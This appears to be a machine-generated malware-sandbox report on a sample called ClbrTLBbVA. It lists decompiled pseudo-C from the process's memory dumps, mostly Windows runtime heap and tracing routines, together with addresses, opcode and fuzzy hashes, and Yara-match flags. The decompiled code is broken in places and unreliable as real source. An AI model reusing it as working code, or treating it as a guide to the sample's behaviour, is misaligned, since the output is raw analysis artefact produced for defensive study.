				_push( *_t29 & 0x000000ff);
				return E016EB640(E016E9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                        0x01778ed6
                                        0x01778ee5
                                        0x01778eed
                                        0x01778ef0
                                        0x01778efa
                                        0x01778f03
                                        0x01778f0c
                                        0x01778f15
                                        0x01778f24
                                        0x01778f27
                                        0x01778f31
                                        0x01778f43
                                        0x01778f33
                                        0x01778f3c
                                        0x01778f3c
                                        0x01778f4e
                                        0x01778f4f
                                        0x01778f51
                                        0x01778f56
                                        0x01778f69

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cd591ccac6f4db97225094692b8aaab3283e549ffc8d8b11d05450b79a2aa0af
                                        • Instruction ID: 51dd51e05c8ee35054a69b244baa847470f80cd0beffbf55d3acc5dfb21cc3f8
                                        • Opcode Fuzzy Hash: cd591ccac6f4db97225094692b8aaab3283e549ffc8d8b11d05450b79a2aa0af
                                        • Instruction Fuzzy Hash: 171112719012199FDB04DFA8D545BADF7F4FF08300F0442AAE519EB341D6349941CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016ADB60 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016ADB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E016ADB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E016AE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L016AE8B0(__ecx, _t14, 0xfff);
							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                        0x016adb64
                                        0x016adb66
                                        0x016adb6b
                                        0x016adbaa
                                        0x016adb71
                                        0x016adb76
                                        0x016adb7a
                                        0x016adba3
                                        0x016adb7c
                                        0x016adb87
                                        0x016adb8b
                                        0x01704fa1
                                        0x01704fb3
                                        0x01704fb8
                                        0x016adb91
                                        0x016adb96
                                        0x016adb98
                                        0x016adb98
                                        0x016adb8b
                                        0x016adb7a
                                        0x016adb9d
                                        0x016adba2

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                        • Instruction ID: 5f1691d7f9ea51d38dab0e98ae878af9ba6ee51974e64e8820d461c9f98ea15a
                                        • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                        • Instruction Fuzzy Hash: 7CF0FC73601623DBD3325AD94C84F2BBA968FD1A60F560439F2059BB44CB608C029EE4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016AB1E1 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016AB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E016C7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E016C7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01727016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                        0x016ab1e8
                                        0x016ab1ea
                                        0x016ab1f3
                                        0x01704a17
                                        0x016ab1f9
                                        0x016ab1f9
                                        0x016ab1f9
                                        0x016ab201
                                        0x01704a21
                                        0x01704a2e
                                        0x00000000
                                        0x00000000
                                        0x01704a3b
                                        0x01704a4d
                                        0x01704a3d
                                        0x01704a46
                                        0x01704a46
                                        0x01704a55
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016ab20a
                                        0x016ab20a
                                        0x016ab20a
                                        0x016ab20a

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                        • Instruction ID: e9681af889f226d5f49cd4971074bdfafa046d72994610429533c42646173ca0
                                        • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                        • Instruction Fuzzy Hash: 2901D172200680DBD323976DCD08F69BBD9EF91750F0840A6FA158B6B2D678DD40CA14
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0173FE87 Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 46%
                                        			E0173FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x179d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E016C7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E016EB640(E016E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                        0x0173fe96
                                        0x0173fe9e
                                        0x0173fea1
                                        0x0173fead
                                        0x0173feb3
                                        0x0173feb9
                                        0x0173fec3
                                        0x0173fed5
                                        0x0173fec5
                                        0x0173fece
                                        0x0173fece
                                        0x0173fee0
                                        0x0173fee1
                                        0x0173fee3
                                        0x0173fee8
                                        0x0173fefb

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06481fccc2619e9129b99afeb46a7457819b03aaf27c3728a0f71ee91d837dd0
                                        • Instruction ID: cb734e3ef4b732b5dfed434bc9ef0bfc368c5609a61eaf0f0350f27f5bd88f03
                                        • Opcode Fuzzy Hash: 06481fccc2619e9129b99afeb46a7457819b03aaf27c3728a0f71ee91d837dd0
                                        • Instruction Fuzzy Hash: 15016271A00209EFCB14DFA8D946A6EB7F4FF08704F144199F915DB382D635E902CB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01778F6A Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 48%
                                        			E01778F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x179d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E016C7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E016EB640(E016E9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                        0x01778f6a
                                        0x01778f79
                                        0x01778f81
                                        0x01778f84
                                        0x01778f8b
                                        0x01778f91
                                        0x01778f94
                                        0x01778f9e
                                        0x01778fb0
                                        0x01778fa0
                                        0x01778fa9
                                        0x01778fa9
                                        0x01778fbb
                                        0x01778fbc
                                        0x01778fbe
                                        0x01778fc3
                                        0x01778fd6

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cbf886167ccf4f30f9a819acd2d8abdb72ef1c60776217e914aebbf0c3e87e62
                                        • Instruction ID: d783feabb457f443032d7ef8edd8ce01dde982a22a26140e986a2ebd8672ea47
                                        • Opcode Fuzzy Hash: cbf886167ccf4f30f9a819acd2d8abdb72ef1c60776217e914aebbf0c3e87e62
                                        • Instruction Fuzzy Hash: 23014475A0120DAFDB00DFB8D945AAEBBF5FF18300F504059B905EB380DA34DA00CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0176131B Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 48%
                                        			E0176131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x179d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E016C7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E016EB640(E016E9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                        0x0176131b
                                        0x0176132a
                                        0x01761330
                                        0x01761336
                                        0x0176133e
                                        0x01761341
                                        0x01761344
                                        0x0176134f
                                        0x01761361
                                        0x01761351
                                        0x0176135a
                                        0x0176135a
                                        0x0176136c
                                        0x0176136d
                                        0x0176136f
                                        0x01761374
                                        0x01761387

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3f8fd94d60a7cd3906653cea0ffd9cb3c5d6e9fd0a1378caa0711e77c5d74e8b
                                        • Instruction ID: 434be7917e6bc8161222b7b180e2e8a2891e487dedc80ae690f3649f96680856
                                        • Opcode Fuzzy Hash: 3f8fd94d60a7cd3906653cea0ffd9cb3c5d6e9fd0a1378caa0711e77c5d74e8b
                                        • Instruction Fuzzy Hash: BD013171A01249AFCB04DFA9D949AAEB7F4FF58700F404059BD05EB341E6349A00CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004172E6 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1f860fdeed835e20b24a61c14895bc032c37403b7c27b3bc7a49c2c73c8f4685
                                        • Instruction ID: 22957df84acb1587ee7b73e9cd44c1d4be677fd3e782b94bb9827da342d6ff04
                                        • Opcode Fuzzy Hash: 1f860fdeed835e20b24a61c14895bc032c37403b7c27b3bc7a49c2c73c8f4685
                                        • Instruction Fuzzy Hash: 53E07D636566062683050D1EDC448F9FF26E6DF67279063AAEA08FBAE18C37C00D4394
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016CC577 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016CC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E016CC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x16811cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E017788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                        0x016cc577
                                        0x016cc57d
                                        0x016cc581
                                        0x016cc5b5
                                        0x016cc5b9
                                        0x016cc5ce
                                        0x016cc5ce
                                        0x016cc5ca
                                        0x00000000
                                        0x016cc5ca
                                        0x016cc5c4
                                        0x016cc5c8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016cc5ad
                                        0x00000000
                                        0x016cc5af

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 766ba6964225ee78e8422166163363e6172efd3efa7d7b6b245d1cee011fe2bf
                                        • Instruction ID: 0ee2ce51d383db4d204ee15179419716f69a2b4f4f7cf5e3d7825db0b688f598
                                        • Opcode Fuzzy Hash: 766ba6964225ee78e8422166163363e6172efd3efa7d7b6b245d1cee011fe2bf
                                        • Instruction Fuzzy Hash: 60F090B29156909EE736971CC814B327FD4DB29E70FD4456ED50D87306C7A4D8A0C255
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01778D34 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 43%
                                        			E01778D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x179d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E016C7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E016EB640(E016E9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                        0x01778d34
                                        0x01778d43
                                        0x01778d4b
                                        0x01778d4e
                                        0x01778d52
                                        0x01778d5c
                                        0x01778d6e
                                        0x01778d5e
                                        0x01778d67
                                        0x01778d67
                                        0x01778d79
                                        0x01778d7a
                                        0x01778d7c
                                        0x01778d81
                                        0x01778d94

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4f44f1ab53b42518a5278f85f183479bcf8365a3a214fa12d9052ab9c40109be
                                        • Instruction ID: e7c706d24ef92b815be38d3272b1a8bc963d9e34905dc3b695eeb74870efd28c
                                        • Opcode Fuzzy Hash: 4f44f1ab53b42518a5278f85f183479bcf8365a3a214fa12d9052ab9c40109be
                                        • Instruction Fuzzy Hash: 07F0B470A04609AFDB14EFB8D945A6EB7B4EF18700F508099E905EB280DA34D900CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762073 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 94%
                                        			E01762073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0175FD22(__ecx);
				_t19 =  *0x179849c - _t3; // 0x2f2690f
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1798748; // 0x0
					if(__eflags <= 0) {
						E01761C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1798724 & 0x00000004;
							if(( *0x1798724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1798724; // 0x0
					return E01758DF1(__ebx, 0xc0000374, 0x1795890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                        0x01762076
                                        0x01762078
                                        0x0176207d
                                        0x01762083
                                        0x017620a4
                                        0x017620aa
                                        0x017620ac
                                        0x017620b7
                                        0x017620ba
                                        0x017620bc
                                        0x017620c9
                                        0x017620c9
                                        0x017620d0
                                        0x017620d2
                                        0x00000000
                                        0x017620d2
                                        0x017620be
                                        0x017620c3
                                        0x017620c5
                                        0x017620c7
                                        0x00000000
                                        0x00000000
                                        0x017620c7
                                        0x017620bc
                                        0x017620d4
                                        0x01762085
                                        0x01762085
                                        0x017620a3
                                        0x017620a3

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 86d48f74acb0331e1c002588a57689fbe1938b3b523f69ca7701e0850f5fee94
                                        • Instruction ID: ced0f52520472a37facab44bc152f6a30d884633693889e8dc69d70fb86758ae
                                        • Opcode Fuzzy Hash: 86d48f74acb0331e1c002588a57689fbe1938b3b523f69ca7701e0850f5fee94
                                        • Instruction Fuzzy Hash: F9F0202A4252894ADFB36B2830142E5FB8ADB9A120B094886DC901720FC8358887CB22
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E927A Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 54%
                                        			E016E927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L016C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E016EFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E016E92C6(_t11, _t14);
				}
				return _t11;
			}





                                        0x016e9295
                                        0x016e9299
                                        0x016e929f
                                        0x016e92aa
                                        0x016e92ad
                                        0x016e92ae
                                        0x016e92af
                                        0x016e92b0
                                        0x016e92b4
                                        0x016e92bb
                                        0x016e92bb
                                        0x016e92c5

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                        • Instruction ID: 9940365db007fe2c477cc019b49ce4ff9da701f27dd8934640f3df827427781a
                                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                        • Instruction Fuzzy Hash: 2FE02B323515016BEB219E0ACC88F1337AEDFD2724F00407CB9001E242CAE5DC0887A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016C746D Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 88%
                                        			E016C746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E016BEB70(__ecx, 0x17979a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E016E95D0();
							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                        0x016c746d
                                        0x016c746d
                                        0x016c746d
                                        0x016c7471
                                        0x016c7488
                                        0x0170f92d
                                        0x016c748e
                                        0x016c7491
                                        0x016c7495
                                        0x0170f937
                                        0x0170f93a
                                        0x0170f94e
                                        0x0170f953
                                        0x0170f956
                                        0x0170f956
                                        0x016c7495
                                        0x00000000
                                        0x016c7488
                                        0x016c7473
                                        0x016c7478
                                        0x016c747d
                                        0x016c7481
                                        0x00000000
                                        0x016c7481
                                        0x016c747d
                                        0x016c747a
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc648e52ce3004e1b69bacda1f27ec96119181ff6a4eeb9c69f34cff157c97f7
                                        • Instruction ID: ba0b16458f0cedc94933b2f5c6853be81657b1e1296696ef5bc9cde3f32ed8a5
                                        • Opcode Fuzzy Hash: dc648e52ce3004e1b69bacda1f27ec96119181ff6a4eeb9c69f34cff157c97f7
                                        • Instruction Fuzzy Hash: DEF0BE34912245EADF129B6CCC40BBAFFA2EF04A10F04825DD891EB2A1E7259801CF99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01778CD6 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 36%
                                        			E01778CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x179d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E016C7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E016EB640(E016E9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                        0x01778ce5
                                        0x01778ced
                                        0x01778cf0
                                        0x01778cfb
                                        0x01778d0d
                                        0x01778cfd
                                        0x01778d06
                                        0x01778d06
                                        0x01778d18
                                        0x01778d19
                                        0x01778d1b
                                        0x01778d20
                                        0x01778d33

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6358588cb6c1b6432541844a4b484dc0073d57459e96472afeba6739e5d8779b
                                        • Instruction ID: d332800a1fb23d71d8cb32d043ab793851fd840550ee0e540343383e6f08acd4
                                        • Opcode Fuzzy Hash: 6358588cb6c1b6432541844a4b484dc0073d57459e96472afeba6739e5d8779b
                                        • Instruction Fuzzy Hash: E1F08271A05609ABDF04DBB8E95AE6EB7B4EF18300F50019DE916EB280EA34D940CB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01778B58 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 36%
                                        			E01778B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x179d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E016C7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E016EB640(E016E9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                        0x01778b67
                                        0x01778b6f
                                        0x01778b72
                                        0x01778b7d
                                        0x01778b8f
                                        0x01778b7f
                                        0x01778b88
                                        0x01778b88
                                        0x01778b9a
                                        0x01778b9b
                                        0x01778b9d
                                        0x01778ba2
                                        0x01778bb5

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce75627a63af39cc049a0f2bd6592c94d15560155c7881a0533d7ea997bcf981
                                        • Instruction ID: 675333972b2808359645bf39cc6f9298d0425620ef7be9497c7a2bcb1cb18fad
                                        • Opcode Fuzzy Hash: ce75627a63af39cc049a0f2bd6592c94d15560155c7881a0533d7ea997bcf981
                                        • Instruction Fuzzy Hash: 4FF082B1A05259ABDF10EBA8D90AE7EB7B4EF14700F44059DBA05DB390EA34E900C799
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016A4F2E Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016A4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E017788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E016CC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1681030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                        0x016a4f2e
                                        0x016a4f34
                                        0x016a4f38
                                        0x01700b85
                                        0x01700b85
                                        0x01700b89
                                        0x01700b9a
                                        0x01700b9a
                                        0x01700b9f
                                        0x00000000
                                        0x01700b9f
                                        0x01700b94
